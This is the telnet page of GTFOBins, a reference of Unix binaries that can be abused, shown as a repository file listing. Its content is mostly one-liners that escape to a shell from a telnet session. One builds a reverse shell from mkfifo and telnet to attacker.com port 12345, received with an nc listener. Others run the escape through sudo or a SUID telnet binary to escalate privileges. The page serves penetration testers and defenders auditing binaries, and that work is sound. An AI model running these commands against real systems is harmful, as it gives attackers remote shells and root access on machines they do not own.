GTFOBins.github.io/_gtfobins/telnet.md
2018-05-24 21:05:11 +01:00

900 B

functions
exec-interactive reverse-shell sudo-enabled suid-limited
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 telnet $RHOST $RPORT ^] !/bin/sh
description code
Run `nc -l -p 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 TF=$(mktemp) rm $TF mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 sudo telnet $RHOST $RPORT ^] !/bin/sh
description code
BSD version only. Needs to be connected first. RHOST=attacker.com RPORT=12345 ./telnet $RHOST $RPORT ^] !/bin/sh